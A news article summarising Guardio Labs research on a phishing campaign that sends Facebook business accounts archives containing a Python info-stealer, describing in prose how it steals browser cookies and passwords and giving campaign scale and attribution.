How hackers are targeting users
These messages contain a RAR/ZIP archive which includes a downloader for an evasive Python-based stealer. This file can steal cookies and passwords stored in the victim’s browser. Researchers have discovered that nearly one out of seventy targeted accounts is getting compromised and victimising users with massive financial losses. The report also includes screenshots to explain how these Facebook Messages work.
At first, hackers send phishing messages to Facebook business accounts. These messages either pretend to report copyright violations or request more information about a product. The attached archive includes a batch file that, if executed, can fetch a malware dropper from GitHub repositories to evade blocklists and minimise distinctive traces.
Apart from the payload (project.py), the batch script also fetches a standalone Python environment. This is required by the info-stealing malware and adds endurance by setting the stealer binary to execute at system startup. The project.py file comes with five layers of protection to confuse and make it more challenging for AV engines to discover the threat.
This malware can collect the cookies and login data stored on the victim’s web browser into a ZIP archive named ‘Document.zip’. It then sends the stolen information to the attackers via Telegram or Discord bot API.
In the end, the stealer clears all cookies from the victim’s device to log them out of their accounts. This gives the scammers enough time to hijack the newly compromised account by changing the passwords.
It is important to note that social media companies take a while to respond to emails about hijacked accounts. This also offers cybercriminals more time to misuse the hacked accounts with fraudulent activities.
The scale of the hacking campaign discovered by Guardio Labs is alarming as it is widespread and is affecting several regions. As per the report, nearly 100,000 phishing messages were sent primarily to Facebook users in North America, Europe, Australia, Japan and Southeast Asia every week.
The report also notes that roughly 7% of all of Facebook’s business accounts have been targeted. Out of which, the malicious archive was downloaded by 0.4% of accounts. However, to be infected by the malware, the users still have to execute the batch file,
Guardio also attributed this campaign to Vietnamese hackers. The researchers discovered strings in the malware that used the “Coc Coc” web browser, which is popular in Vietnam.